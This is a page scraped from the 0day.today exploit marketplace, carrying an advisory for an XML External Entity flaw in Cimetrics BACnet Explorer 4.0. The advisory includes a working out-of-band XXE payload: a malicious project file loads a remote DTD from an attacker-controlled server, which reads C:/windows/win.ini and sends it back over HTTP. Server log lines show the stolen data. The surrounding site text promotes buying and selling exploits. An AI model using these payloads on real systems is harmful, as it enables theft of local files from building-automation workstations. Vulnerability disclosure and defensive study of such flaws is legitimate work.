0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Cimetrics BACnet Explorer 4.0 - XML External Entity Injection Vulnerability

Author

LiquidWorm

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

Cimetrics BACnet Explorer 4.0 XXE Vulnerability
 
 
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
Affected version: 4.0.0.0
 
Summary: The BACnet Explorer is a BACnet client application that
helps auto discover BACnet devices.
 
Desc: BACnetExplorer suffers from an XML External Entity (XXE)
vulnerability using the DTD parameter entities technique resulting
in disclosure and retrieval of arbitrary data on the affected node
via out-of-band (OOB) attack. The vulnerability is triggered when
input passed to the xml parser is not sanitized while parsing the
xml project file.
 
Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1
           mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR
           BACstac Library: 1.5.6116.0
           BACstac Service: 6.8.3
 
--
 
Open file evil.xml:
 
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml">
%remote;
%root;
%oob;]>
 
 
xxe.xml on the web server:
 
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> ">
 
 
pyhon -m SimpleHTTPServer 8080
 
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 -
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 -

#  0day.today [2024-12-27]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Cimetrics BACnet Explorer 4.0 - XML External Entity Injection Vulnerability

Report Error

Report Error